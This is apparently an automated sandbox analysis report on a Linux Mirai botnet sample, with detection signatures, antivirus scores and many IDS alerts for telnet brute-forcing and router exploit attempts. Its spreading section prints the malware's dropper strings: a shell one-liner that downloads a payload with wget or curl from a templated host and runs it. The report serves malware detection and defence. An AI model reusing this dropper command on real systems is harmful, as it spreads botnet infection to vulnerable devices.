Analysis Report rIbyGX66Op

Overview

General Information

Sample Name: rIbyGX66Op
Analysis ID: 397469
MD5: eec5c6c219535fba3a0492ea8118b397
SHA1: 292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256: 12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
Infos:

Detection

Mirai
Score: 100
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Yara detected Mirai
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Drops files in suspicious directories
Executes the "iptables" command to insert, remove and/or manipulate rules
Found strings indicative of a multi-platform dropper
Opens /proc/net/* files useful for finding connected devices and routers
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Terminates several processes with shell command 'killall'
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "iptables" command used for managing IP filtering and manipulation
HTTP GET or POST without a user agent
Reads system information from the proc file system
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Sample listens on a socket
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Writes HTML files containing JavaScript to disk
Writes shell script files to disk
Yara signature match

Classification

AV Detection:

barindex
Antivirus / Scanner detection for submitted sample
Source: rIbyGX66Op Avira: detected
Antivirus detection for dropped file
Source: /usr/networks Avira: detection malicious, Label: LINUX/Mirai.lldau
Multi AV Scanner detection for submitted file
Source: rIbyGX66Op Virustotal: Detection: 68% Perma Link
Source: rIbyGX66Op Metadefender: Detection: 51% Perma Link
Source: rIbyGX66Op ReversingLabs: Detection: 68%

Spreading:

barindex
Found strings indicative of a multi-platform dropper
Source: rIbyGX66Op String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: rIbyGX66Op String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: rIbyGX66Op String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Opens /proc/net/* files useful for finding connected devices and routers
Source: /tmp/rIbyGX66Op (PID: 4601) Opens: /proc/net/route Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 4601) Opens: /proc/net/route Jump to behavior

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.77.238.132: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.97.247.73: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.190.22.139: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 122.228.249.221: -> 192.168.2.20:
Source: Traffic Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:43610
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.151.146.9: -> 192.168.2.20:
Source: Traffic Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:43620
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 95.211.103.19: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.208.167.77: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 88.76.41.4: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 178.16.5.51: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 121.127.240.171: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 2.244.147.91: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.66.240.0: -> 192.168.2.20:
Source: Traffic Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:43626
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.97.251.124: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 178.11.12.82: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 149.56.185.133: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 178.12.212.10: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:36484 -> 34.90.159.216:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:36484 -> 34.90.159.216:80
Source: Traffic Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:43664
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 31.150.220.105: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 67.143.229.1: -> 192.168.2.20:
Source: Traffic Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:43914
Source: Traffic Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:43922
Source: Traffic Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:43936
Source: Traffic Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:43938
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 149.11.89.129: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 45.66.122.140: -> 192.168.2.20:
Source: Traffic Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:43974
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.44.132.119: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 88.66.229.122: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 184.105.35.86: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 187.9.231.26: -> 192.168.2.20:
Source: Traffic Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:44216
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 193.168.227.106: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 2.204.138.252: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.77.64.1: -> 192.168.2.20:
Source: Traffic Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:44220
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 193.203.134.203: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 63.143.96.217:8000 -> 192.168.2.20:8000
Source: Traffic Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:44244
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 62.224.12.236: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 197.13.3.22: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.44.112.190: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.83.146:58148 -> 192.168.2.20:8000
Source: Traffic Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:44250
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 218.86.84.189:1111 -> 192.168.2.20:8000
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 209.51.191.242: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.17.32.41: -> 192.168.2.20:
Source: Traffic Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:44512
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 84.17.32.179: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 115.114.112.90: -> 192.168.2.20:
Source: Traffic Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:44532
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.23.128:22104 -> 192.168.2.20:8000
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.59.151.184: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 50.242.148.249: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 119.253.14.61: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 151.177.190.108:4000 -> 192.168.2.20:8000
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 116.68.110.71:16802 -> 192.168.2.20:8000
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 180.188.242.113:58745 -> 192.168.2.20:8000
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.244.59.137: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 78.35.102.107: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 78.133.138.166: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 47.104.191.32:4748 -> 192.168.2.20:8000
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.217.98.171: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 187.103.124.110: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 78.43.107.137: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.95.211.247: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 194.81.6.182: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 73.231.144.28: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 91.213.211.120: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 185.54.120.139: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.203.215.70: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.48.12.98: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 218.248.167.25: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 134.255.195.11: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.208.68.59: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 109.206.193.130: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 47.229.50.113: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.131.13.8: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 201.10.209.246: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 185.229.189.17: -> 192.168.2.20:
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:38662 -> 193.176.117.172:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:38662 -> 193.176.117.172:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 213.135.233.46: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 81.170.129.57: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 218.248.175.181: -> 192.168.2.20:
Source: Traffic Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54674
Source: Traffic Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54678
Source: Traffic Snort IDS: 2023450 ET TROJAN Possible Linux.Mirai Login Attempt (xmhdipc) 192.168.2.20:54678 -> 86.125.215.125:23
Source: Traffic Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54680
Source: Traffic Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54682
Source: Traffic Snort IDS: 2023443 ET TROJAN Possible Linux.Mirai Login Attempt (klv123) 192.168.2.20:54682 -> 86.125.215.125:23
Source: Traffic Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54684
Source: Traffic Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54722
Source: Traffic Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54730
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.227.188.172: -> 192.168.2.20:
Source: Traffic Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54734
Source: Traffic Snort IDS: 2023439 ET TROJAN Possible Linux.Mirai Login Attempt (hi3518) 192.168.2.20:54734 -> 86.125.215.125:23
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 23.91.11.89: -> 192.168.2.20:
Source: Traffic Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54946
Source: Traffic Snort IDS: 2023436 ET TROJAN Possible Linux.Mirai Login Attempt (anko) 192.168.2.20:54946 -> 86.125.215.125:23
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:56306 -> 159.138.143.231:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:56306 -> 159.138.143.231:80
Source: Traffic Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54956
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.54.37.162: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 154.196.195.2: -> 192.168.2.20:
Source: Traffic Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54968
Source: Traffic Snort IDS: 2023434 ET TROJAN Possible Linux.Mirai Login Attempt (7ujMko0vizxv) 192.168.2.20:54968 -> 86.125.215.125:23
Source: Traffic Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54970
Source: Traffic Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54976
Source: Traffic Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54978
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.165.153.254: -> 192.168.2.20:
Source: Traffic Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54980
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 158.165.7.160: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 208.126.19.231: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 68.115.35.242: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 107.165.48.81: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 118.89.78.198: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 172.221.96.235: -> 192.168.2.20:
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:38558 -> 216.92.218.45:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:38558 -> 216.92.218.45:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 5.144.22.98: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 88.66.165.152: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 88.75.167.170: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.223.209.67: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 156.234.234.92: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.39.200.252: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 200.155.33.253: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.211.141.231: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 49.231.46.84: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 92.61.32.163: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.103.99.69: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 114.231.120.179: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.142.250.140: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 50.220.200.185: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 10.220.105.45: -> 192.168.2.20:
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:50210 -> 23.6.11.241:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:50210 -> 23.6.11.241:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.6.11.241:80 -> 192.168.2.20:50210
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.72.254.150: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.206.175.206: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 141.64.0.6: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 59.26.181.228:8080 -> 192.168.2.20:8000
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.142.250.149: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 81.228.94.155: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:50454 -> 69.195.90.130:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:50454 -> 69.195.90.130:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:57946 -> 184.29.252.151:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:57946 -> 184.29.252.151:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.29.252.151:80 -> 192.168.2.20:57946
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.230.193.38: -> 192.168.2.20:
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:41912 -> 52.192.234.143:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:41912 -> 52.192.234.143:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.37.98.208: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.154.84.219: -> 192.168.2.20:
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:33260 -> 3.11.29.16:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:41564 -> 120.25.215.76:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:41564 -> 120.25.215.76:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:35870 -> 47.108.201.233:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:35870 -> 47.108.201.233:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.201.101.67: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 80.132.248.162: -> 192.168.2.20:
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:38446 -> 156.244.87.14:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:38446 -> 156.244.87.14:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.215.27.127: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 104.164.160.90: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.141.138.217:65176 -> 192.168.2.20:8000
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.117.123.50: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 193.77.221.73: -> 192.168.2.20:
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:53946 -> 142.92.252.36:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:53946 -> 142.92.252.36:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.101.39.15: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.116.90.98: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.161.95.20: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.141.23.114:1900 -> 192.168.2.20:8000
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 103.41.25.150:54444 -> 192.168.2.20:8000
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 117.201.195.174:4000 -> 192.168.2.20:8000
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:33316 -> 23.223.90.123:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:33316 -> 23.223.90.123:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.223.90.123:80 -> 192.168.2.20:33316
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 89.166.157.83: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 81.25.228.4: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.141.181.148:4000 -> 192.168.2.20:8000
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:47544 -> 23.61.13.112:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:47544 -> 23.61.13.112:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.61.13.112:80 -> 192.168.2.20:47544
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:37564 -> 81.2.194.201:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:37564 -> 81.2.194.201:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:60742 -> 13.58.205.33:8080
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:60742 -> 13.58.205.33:8080
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:46956 -> 51.182.50.200:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:46956 -> 51.182.50.200:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:40652 -> 104.72.178.146:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:40652 -> 104.72.178.146:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.72.178.146:80 -> 192.168.2.20:40652
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 188.1.236.70: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.228.33.143: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.180.140.79: -> 192.168.2.20:
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:59032 -> 85.23.70.174:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:59032 -> 85.23.70.174:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:59348 -> 95.217.3.9:80
